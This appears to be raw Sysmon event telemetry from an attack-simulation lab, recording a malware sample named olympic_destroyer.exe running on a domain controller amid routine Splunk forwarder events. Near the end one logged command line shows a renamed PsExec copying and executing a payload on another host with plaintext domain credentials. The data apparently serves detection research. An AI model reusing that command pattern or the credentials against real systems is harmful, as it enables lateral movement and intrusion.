SERVICEtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49402-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 354300x8000000000000000296940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:52.113{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local49402-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local135epmap 23542300x8000000000000000296939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:54.028{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=370608BD46619E7EDD3CD70A242DF5D7,SHA256=53FE4B4B553B3815FF3BCDE3E6625EF04EA921D998B20E4A41E9B250A545AE81,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220926Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:54.203{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7962CEC9E7F42721A8DF9C95903C6F73,SHA256=01A46F4AC739417EC8E969C0022E9EFE935A3849A9C8292C0B2316A831E1D620,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220927Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:55.344{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D999069BD1D25FF0EF0B8BCF597CB42,SHA256=2FCF3E705121C6F038C314BCE97C358DBBB904D0DC39A446A6313C57479EEC08,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296951Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:53.833{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49404-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296950Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:53.833{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49404-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000296949Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:55.075{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD8F3D674419ABFD03A47DB8C7F4A2A2,SHA256=51CF0CBB279B78E075BB93BB4BC4172058CEDEA14C425831E47A9469C2595431,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296948Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:52.995{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49403-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000296947Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:52.995{C8EA50B7-F130-6215-2900-000000003802}3048C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49403-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000220928Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:56.359{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D7855EAB9C7D0EAFD9EA5CEBA219C35A,SHA256=45B717B24E30039A3AB365C86033E8924FA3287348CEF46208E96E70BA855EC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296952Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:56.128{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C004EDC450384893DBA92D4975794826,SHA256=D039D5F4720D67657FEDAB607D90010B127C0CEDC2914F35EF0D5C4CBFBEE000,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296954Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:57.143{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20837E2242C6FD7CA22DA813B6704DA1,SHA256=737A94D879521BB86C674708BE24A2D9B64A079A39BE9AC1490234C730A4C6B3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220930Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:55.622{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51614-false10.0.1.12-8000- 23542300x8000000000000000220929Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:57.375{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E066785B59DD809E66A26B3EA75564C8,SHA256=25FB05B7EDF98542E1E5544DB2F80EF961DA78C3A01E668033E564EFAFE46A05,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000296953Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:54.563{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49405-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296955Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:58.156{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=582C89CB4B194D4F1130BDB9158F7201,SHA256=6EFE75C4EBD0E8D4F23C83E11BCDBAA9B588F2D3F5DD7745F3B4845AC606741A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220931Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:58.390{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B15CF6BF3217545FA209AA044E8FE2E5,SHA256=FBE3497F83E26F801F0A29DEE0DDD45C3692868C3026FD5E524A005B73E67C71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296956Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:13:59.176{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41594A71A6C8EFC49AA9FB64934575D6,SHA256=88B6AA9B4332219A62CB786D8BE364ABF026FF916AA16E35CB96A06A23991378,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220932Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:13:59.406{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFBFF80638EF6E5D350B52EAF3C562C7,SHA256=E97F8FC5028DDDBC56E5A0045A7F230ADFF95E89B94BB4C7380C88BCC2AE4BB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220933Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:00.422{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A554732CCDA544303E3C875B1BC7285,SHA256=F775B27D8E75D69EE2062EC3E4CE7B81E7F08326D3110747929EE0D02B5D2253,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296957Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:00.183{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB6BE28E6D6B6E19D5F759F2EEF4CF4,SHA256=3CB3F3E2E7C6409D91CA434657A28420E4D14283A69475A75AD3507011DE6541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220934Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:14:01.437{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0123C7C0088DCE006D003187F528108,SHA256=F83FF5A2F2532F090F34B436D234907319781EC6451E4B456139A5C177748FCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296974Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.929{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296973Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.929{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296972Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.929{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296971Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.929{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296970Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.929{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296969Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.929{C8EA50B7-12E6-6216-4B05-000000003802}67924840C:\Temp\olympic_destroyer.exe{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000296968Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.931{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-1.eu-central-1.compute.internal -u "VULT.LOCAL\r.vult" -p "LottaVirus2019" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000296967Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.929{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-16F9-6216-1307-000000003802}2052C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296966Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.582{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-16F9-6216-1207-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296965Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296964Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296963Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296962Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.582{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296961Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.580{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-16F9-6216-1207-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296960Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.579{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-16F9-6216-1207-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296959Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:14:01.577{C8EA50B7-16F9-6216-1207-000000003802}6252C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program 